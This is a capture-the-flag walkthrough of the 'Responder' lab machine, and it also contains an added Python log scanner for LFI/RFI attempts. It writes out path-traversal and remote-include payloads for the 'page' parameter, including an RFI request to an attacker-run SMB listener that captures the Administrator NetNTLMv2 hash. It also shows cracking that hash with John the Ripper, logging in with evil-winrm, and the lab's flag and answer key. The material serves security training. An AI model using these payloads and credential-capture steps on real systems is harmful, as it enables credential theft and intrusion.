Respond

Target Information:

  • IP: 10.129.113.205
  • TCP Port 80: Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)

==============================================================

Task #1: When visiting the web service using the IP address, what is the domain that we are being redirected to?

  • A: unika.htb
  • To visit:
    • Edit /etc/hosts to include 10.129.113.205 unika.htb
    • This makes the unika.htb hostname resolve locally; the .htb TLD is not in public DNS, so without the hosts entry the redirect cannot be followed

Task #2: Which scripting language is being used on the server to generate webpages?

  • A: PHP

  • nmap 10.129.113.205 -sC -sV -T4 -Pn -p-

    $ nmap 10.129.113.205 -sC -sV -T4 -Pn -p-
    Starting Nmap 7.80 ( https://nmap.org ) at 2022-12-13 14:46 EST
    Nmap scan report for unika.htb (10.129.113.205)
    Host is up (0.11s latency).
    Not shown: 65532 filtered ports
    PORT     STATE SERVICE    VERSION
    80/tcp   open  http       Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
    |_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
    |_http-title: Unika
    5985/tcp open  http       Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
    |_http-server-header: Microsoft-HTTPAPI/2.0
    |_http-title: Not Found
    7680/tcp open  pando-pub?
    Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
    

Task #3: What is the name of the URL parameter which is used to load different language versions of the webpage?

Task #4: Which of the following values for the page parameter would be an example of exploiting a Local File Include (LFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"

Task #5: Which of the following values for the page parameter would be an example of exploiting a Remote File Include (RFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"

  • A: //10.10.14.6/somefile

Task #6: What does NTLM stand for?

  • A: New Technology LAN Manager

Task #7: Which flag do we use in the Responder utility to specify the network interface?

  • A: -I
  • https://www.kali.org/tools/responder/
    • sudo git clone https://github.com/lgandx/Responder /opt/Responder
    • Add alias responder="python3 /opt/Responder/Responder.py" in ~/.bashrc, then source
    • pip3 install netifaces
    • sudo python3 /opt/Responder/Responder.py -I tun0
      • tun0 is the VPN tunnel interface created by the OpenVPN connection to the lab; Responder has to listen there so the target box can reach it (the LAN interface would not be routable from the target)

Task #8: There are several tools that take a NetNTLMv2 challenge/response and try millions of passwords to see if any of them generate the same response. One such tool is often referred to as john, but the full name is what?

  • A: John the Ripper

Task #9: What is the password for the administrator user?

  • A: badminton

  • Use the remote file inclusion to make the web server fetch a file from the Responder listener (our tun0 IP):

    • Make sure responder is still running

    • Visit "http://unika.htb/index.php?page=//10.10.16.143/anything"; the server tries to fetch the file over SMB and Responder captures the NetNTLMv2 challenge/response of the account Apache runs as (Administrator here)

  • Save the captured Administrator::RESPONDER:... line to hash.txt, then crack it: john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt, which recovers badminton
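The LFI/RFI values in Tasks 4 and 5 and the capture request in Task 9 all travel through the same "page" parameter, so they are easy to spot on the server side. The Python below is an added example, not part of this write-up: it scans Apache combined-format access log lines for traversal and remote-include values in that parameter. The log lines and timestamps are constructed; the IP, paths and parameter name are the ones used above.

```python
# Added example, not part of the original write-up: flag LFI/RFI attempts
# against the "page" parameter in Apache combined-format access logs.
import re
from urllib.parse import parse_qs, unquote, urlsplit

# host ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')
# "../" or "..\" at a path boundary (Windows target, so both separators count)
TRAVERSAL_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)')
# "//host/...", "\\host\...", or "scheme://host/..." -> a remote (UNC/URL) include
REMOTE_RE = re.compile(r'^(?:[a-z][a-z0-9+.-]*:)?[\\/]{2}', re.IGNORECASE)
WATCHED_PARAMS = {'page'}  # the include parameter on this site


def classify_value(value):
    """Return 'rfi', 'lfi' or None for one parameter value."""
    v = unquote(value)  # parse_qs decoded once already; this catches double encoding
    if REMOTE_RE.match(v):
        return 'rfi'
    if TRAVERSAL_RE.search(v):
        return 'lfi'
    return None


def scan_line(line):
    """Return the first suspicious watched parameter in one log line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    for name, values in parse_qs(urlsplit(m['target']).query, keep_blank_values=True).items():
        if name.lower() not in WATCHED_PARAMS:
            continue
        for value in values:
            kind = classify_value(value)
            if kind:
                return {'ip': m['ip'], 'ts': m['ts'], 'kind': kind, 'value': value}
    return None


def scan_log(text):
    return [hit for hit in (scan_line(ln) for ln in text.splitlines()) if hit]


# Constructed sample lines mirroring the requests discussed in the write-up
SAMPLE_LOG = """\
10.10.16.143 - - [13/Dec/2022:14:50:01 -0500] "GET /index.php?page=french.html HTTP/1.1" 200 5130 "-" "Mozilla/5.0"
10.10.16.143 - - [13/Dec/2022:14:51:12 -0500] "GET /index.php?page=../../../../../../../../windows/system32/drivers/etc/hosts HTTP/1.1" 200 824 "-" "curl/7.81"
10.10.16.143 - - [13/Dec/2022:14:52:40 -0500] "GET /index.php?page=//10.10.16.143/anything HTTP/1.1" 200 0 "-" "curl/7.81"
10.10.16.143 - - [13/Dec/2022:14:53:03 -0500] "GET /index.php?page=%2e%2e%2f%2e%2e%2fwindows%2fwin.ini HTTP/1.1" 200 310 "-" "curl/7.81"
"""

if __name__ == '__main__':
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} {hit['kind'].upper()} page={hit['value']}")
```

The first sample line (french.html) is the legitimate use and produces no hit; the other three are flagged as LFI, RFI and LFI respectively.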

Task #10: We'll use a Windows service (i.e. running on the box) to remotely access the Responder machine using the password we recovered. What TCP port does it listen on?

  • A: 5985
  • From the earlier nmap scan: 5985/tcp (Microsoft HTTPAPI 2.0) is WinRM
  • Can log in with evil-winrm:
    • sudo apt install ruby rbenv ruby-dev
    • gem install evil-winrm

Submit root flag: ea81b7afddd03efaa0945333ed147fac

  • evil-winrm -u Administrator -p 'badminton' -i 10.129.113.205
  • cat C:/Users/mike/Desktop/flag.txt

Tags

  1. very easy
  2. WinRM
  3. web
  4. responder
  5. LFI
  6. RFI
  7. RCE